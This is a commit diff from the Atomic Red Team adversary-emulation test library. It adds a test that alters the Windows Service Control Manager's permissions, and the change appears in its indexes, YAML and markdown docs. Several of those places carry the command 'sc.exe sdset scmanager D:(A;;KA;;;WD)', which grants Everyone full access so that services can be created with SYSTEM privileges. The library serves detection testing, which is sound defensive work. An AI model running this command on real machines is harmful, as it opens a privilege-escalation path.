Generated docs from job=generate-docs branch=master [ci skip]

2024-05-15 00:55:00 +00:00
parent efa3370b62
commit e855218dba
12 changed files with 68 additions and 3 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1561-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1562-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -996,6 +996,7 @@ execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),ed
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
 execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
+execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Service Control Manager via SDET,bf07f520-3909-4ef5-aa22-877a50f2f77b,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
@@ -672,6 +672,7 @@ execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
 execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
+execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Service Control Manager via SDET,bf07f520-3909-4ef5-aa22-877a50f2f77b,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
@@ -1342,6 +1342,7 @@
  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
  - Atomic Test #6: Snake Malware Service Create [windows]
+  - Atomic Test #7: Modifying ACL of Service Control Manager via SDET [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -926,6 +926,7 @@
  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
  - Atomic Test #6: Snake Malware Service Create [windows]
+  - Atomic Test #7: Modifying ACL of Service Control Manager via SDET [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]

@@ -55389,6 +55389,20 @@ execution:
          '
        name: command_prompt
        elevation_required: true
+    - name: Modifying ACL of Service Control Manager via SDET
+      auto_generated_guid: bf07f520-3909-4ef5-aa22-877a50f2f77b
+      description: "Modify permissions of Service Control Manager via SDSET. This
+        allows any administrative user to escalate privilege and create a service
+        with SYSTEM level privileges.Restart is required.\n[Blog](https://0xv1n.github.io/posts/scmanager/)
+        \ \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'sc.exe sdset scmanager D:(A;;KA;;;WD)
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1053.002:
    technique:
      modified: '2023-11-15T14:38:10.876Z'
@@ -45816,6 +45816,20 @@ execution:
          '
        name: command_prompt
        elevation_required: true
+    - name: Modifying ACL of Service Control Manager via SDET
+      auto_generated_guid: bf07f520-3909-4ef5-aa22-877a50f2f77b
+      description: "Modify permissions of Service Control Manager via SDSET. This
+        allows any administrative user to escalate privilege and create a service
+        with SYSTEM level privileges.Restart is required.\n[Blog](https://0xv1n.github.io/posts/scmanager/)
+        \ \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'sc.exe sdset scmanager D:(A;;KA;;;WD)
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1053.002:
    technique:
      modified: '2023-11-15T14:38:10.876Z'
@@ -20,6 +20,8 @@ Adversaries may leverage these mechanisms to execute malicious content. This can

 - [Atomic Test #6 - Snake Malware Service Create](#atomic-test-6---snake-malware-service-create)

+- [Atomic Test #7 - Modifying ACL of Service Control Manager via SDET](#atomic-test-7---modifying-acl-of-service-control-manager-via-sdet)
+

 <br/>

@@ -312,4 +314,33 @@ sc.exe delete "WerFaultSvc"



+<br/>
+<br/>
+
+## Atomic Test #7 - Modifying ACL of Service Control Manager via SDET
+Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
+[Blog](https://0xv1n.github.io/posts/scmanager/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bf07f520-3909-4ef5-aa22-877a50f2f77b
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sc.exe sdset scmanager D:(A;;KA;;;WD)
+```
+
+
+
+
+
+
 <br/>
@@ -196,6 +196,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: Modifying ACL of Service Control Manager via SDET
+  auto_generated_guid: bf07f520-3909-4ef5-aa22-877a50f2f77b
  description: |
    Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
    [Blog](https://0xv1n.github.io/posts/scmanager/)  
@@ -1609,3 +1609,4 @@ b8147c9a-84db-4ec1-8eee-4e0da75f0de5
 bb6b51e1-ab92-45b5-aeea-e410d06405f8
 b025c580-029e-4023-888d-a42710d76934
 7979dd41-2045-48b2-a54e-b1bc2415c9da
+bf07f520-3909-4ef5-aa22-877a50f2f77b